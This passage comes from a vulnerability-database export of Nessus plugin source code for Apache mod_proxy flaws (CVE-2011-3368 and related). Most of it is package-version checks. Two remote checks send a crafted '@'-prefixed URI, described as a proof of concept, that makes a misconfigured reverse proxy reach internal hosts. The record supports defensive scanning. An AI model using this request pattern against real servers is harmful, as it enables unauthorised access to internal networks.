yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-itk-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-peruser-2.2.15-3.4mdv2010.2\", 
yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-prefork-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-worker-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-source-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"apache-base-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-devel-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-htcacheclean-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_authn_dbd-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dav-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dbd-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_deflate-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_disk_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_file_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ldap-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_mem_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_ajp-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", 
reference:\"apache-mod_proxy_scgi-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_reqtimeout-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ssl-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_userdir-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-modules-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-event-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-itk-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-peruser-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-prefork-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-worker-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-source-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:20:55", "description": "The version of Apache HTTP Server running on the remote host is\naffected by an information disclosure vulnerability. When configured\nas a reverse proxy, improper use of the RewriteRule and ProxyPassMatch\ndirectives could cause the web server to proxy requests to arbitrary\nhosts. 
This allows a remote attacker to indirectly send requests to\nintranet servers.", "edition": 23, "published": "2011-11-29T00:00:00", "title": "Apache HTTP Server mod_proxy Reverse Proxy Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4317", "CVE-2011-3368"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_PROXY_INFO_LEAK.NASL", "href": "https://www.tenable.com/plugins/nessus/56972", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56972);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\");\n script_bugtraq_id(49957, 50802);\n script_xref(name:\"EDB-ID\", value:\"17969\");\n\n script_name(english:\"Apache HTTP Server mod_proxy Reverse Proxy Information Disclosure\");\n script_summary(english:\"Make a malformed HTTP request\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The web server running on the remote host has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apache HTTP Server running on the remote host is\naffected by an information disclosure vulnerability. When configured\nas a reverse proxy, improper use of the RewriteRule and ProxyPassMatch\ndirectives could cause the web server to proxy requests to arbitrary\nhosts. 
This allows a remote attacker to indirectly send requests to\nintranet servers.\"\n );\n # http://mail-archives.apache.org/mod_mbox/httpd-announce/201110.mbox/%3C20111005141541.GA7696%40redhat.com%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7fedbcf7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.qualys.com/blogs/securitylabs/tags/cve-2011-4317\");\n script_set_attribute(attribute:\"see_also\", value:\"http://thread.gmane.org/gmane.comp.apache.devel/46440\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_22.html\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Apache httpd 2.2.22 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this looks like Apache unless paranoid\nif (report_paranoia < 2)\n{\n server = 
http_server_header(port:port);\n\n if ( 'ibm_http_server' >!< tolower(server) && 'apache' >!< tolower(server) && 'oracle http server' >!< tolower(server) && 'oracle-http-server' >!< tolower(server) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like an Apache-based httpd.');\n\n # looks like Apache _httpd_\n if ('apache' >< tolower(server) && ( 'coyote' >< tolower(server) || 'tomcat' >< tolower(server)) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like Apache httpd.');\n}\n\npages = make_list('/');\n\nforeach page (pages)\n{\n # GET 1324:@target-host/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host/page\n # instead of responding with an HTTP 400. this PoC should cover both CVEs\n url = strcat(unixtime(), ':@', get_host_ip(), page);\n res = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n headers = parse_http_headers(status_line:res[0], headers:res[1]);\n http_code = headers['$code'];\n\n # the patched server should always send a 400. just to be on the safe side,\n # we'll explicitly check for a 200 or 404\n if (http_code == 404 || http_code == 200)\n {\n # GET 1324:@target-host:likely-closed-port/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host:likely-closed-port/page\n # instead of responding with an HTTP 400. this PoC should cover both CVEs\n url = strcat(unixtime(), ':@localhost:', (rand() % 535 + 65000), page);\n res = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n headers = parse_http_headers(status_line:res[0], headers:res[1]);\n http_code = headers['$code'];\n\n # the patched server should always send a 400. 
\n # we'll explicitly check for a 503 (resulting from trying to connect to a closed port)\n if (http_code == 503)\n {\n # this will prevent the other plugin (that checks for the\n # incomplete fix for this CVE) from running\n set_kb_item(name:'/tmp/CVE-2011-3368', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus verified this by sending the following request :\\n\\n' +\n chomp(http_last_sent_request()) + '\\n';\n\n if (report_verbosity > 0)\n {\n report +=\n '\\nWhich resulted in a non-400 response :\\n\\n' +\n res[0] +\n chomp(res[1]) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n }\n}\nexit(1, 'Unable to determine if the system is vulnerable on port ' + port);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:18:00", "description": "It was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. 
(CVE-2011-3348)", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:mod_ssl", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-9.NASL", "href": "https://www.tenable.com/plugins/nessus/78270", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-9.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78270);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_xref(name:\"ALAS\", value:\"2011-9\");\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-9)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. 
(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 
\"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:17:56", "description": "The MITRE CVE database describes these CVEs as :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule 
and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character. \n\nThe mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when\nused with mod_proxy_balancer in certain configurations, allows remote\nattackers to cause a denial of service (temporary 'error state' in the\nbackend server) via a malformed HTTP request.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker.\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. 
A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed.", "edition": 23, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:mod_ssl", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-09.NASL", "href": "https://www.tenable.com/plugins/nessus/69568", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-09.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69568);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2015/01/30 14:43:52 $\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_xref(name:\"ALAS\", value:\"2011-09\");\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-09)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MITRE CVE database describes these CVEs as :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a 
malformed URI\ncontaining an initial @ (at sign) character. \n\nThe mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when\nused with mod_proxy_balancer in certain configurations, allows remote\nattackers to cause a denial of service (temporary 'error state' in the\nbackend server) via a malformed HTTP request.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker.\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum upgrade httpd' to upgrade your system. 
Then run 'service\nhttpd restart' to restart the Apache HTTP Server.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"httpd-devel-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:20:55", "description": "The version of Apache HTTP Server running on the remote host has an\ninformation disclosure vulnerability. When configured as a reverse\nproxy, improper use of the RewriteRule and ProxyPassMatch directives\ncould cause the web server to proxy requests to arbitrary hosts. 
This\ncould allow a remote attacker to indirectly send requests to intranet\nservers by making specially crafted HTTP 0.9 requests.\n\nThis vulnerability only affects versions 2.2.x before 2.2.18 that have\nbackported the fix for CVE-2011-3368.", "edition": 23, "published": "2012-02-09T00:00:00", "title": "Apache HTTP Server mod_proxy Reverse Proxy HTTP 0.9 Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3639", "CVE-2011-3368"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_PROXY_INFO_LEAK2.NASL", "href": "https://www.tenable.com/plugins/nessus/57875", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(57875);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-3639\");\n script_bugtraq_id(51869);\n\n script_name(english:\"Apache HTTP Server mod_proxy Reverse Proxy HTTP 0.9 Information Disclosure\");\n script_summary(english:\"Make a malformed HTTP request\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The web server running on the remote host has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apache HTTP Server running on the remote host has an\ninformation disclosure vulnerability. When configured as a reverse\nproxy, improper use of the RewriteRule and ProxyPassMatch directives\ncould cause the web server to proxy requests to arbitrary hosts. 
This\ncould allow a remote attacker to indirectly send requests to intranet\nservers by making specially crafted HTTP 0.9 requests.\n\nThis vulnerability only affects versions 2.2.x before 2.2.18 that have\nbackported the fix for CVE-2011-3368.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545#c15\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.comp.apache.devel/45983\");\n script_set_attribute(attribute:\"see_also\", value:\"http://svn.apache.org/viewvc?view=revision&revision=1188745\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Contact the distro/vendor for the latest update of Apache httpd.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\"); # fixed upstream\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/09\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"apache_mod_proxy_info_leak.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"/tmp/CVE-2011-3368\");\n\n 
exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this looks like Apache unless paranoid\nif (report_paranoia < 2)\n{\n server = http_server_header(port:port);\n\n if ( 'ibm_http_server' >!< tolower(server) && 'apache' >!< tolower(server) && 'oracle http server' >!< tolower(server) && 'oracle-http-server' >!< tolower(server) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like an Apache-based httpd');\n\n # looks like Apache _httpd_\n if ('apache' >< tolower(server) && ( 'coyote' >< tolower(server) || 'tomcat' >< tolower(server)) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like Apache httpd');\n}\n\npages = make_list('/');\n\nforeach page (pages)\n{\n # GET 1324:@target-host/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host/page\n # instead of responding with an HTTP 400\n url = strcat(unixtime(), ':@', get_host_ip(), page);\n res = http_send_recv3(method:'GET', item:url, version:9, port:port, exit_on_fail:TRUE);\n\n # the patched server should always send a 400.\n # HTTP 0.9 won't send a status line so the best we can do is check for the default 400 page.\n # Need to skip over pages that respond to valid requests with a 503, since we will rely on a\n # 503 response after making the next request\n if ('<title>400 Bad Request</title>' >!< res[2] && '<title>503 Service Temporarily Unavailable</title>' >!< res[2])\n {\n # GET 1324:@target-host:likely-closed-port/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host:likely-closed-port/page\n # instead of responding with an HTTP 400\n url = strcat(unixtime(), ':@localhost:', (rand() % 535 + 65000), page);\n res = http_send_recv3(method:'GET', item:url, version:9, port:port, exit_on_fail:TRUE);\n\n # the patched server should always send a 400. 
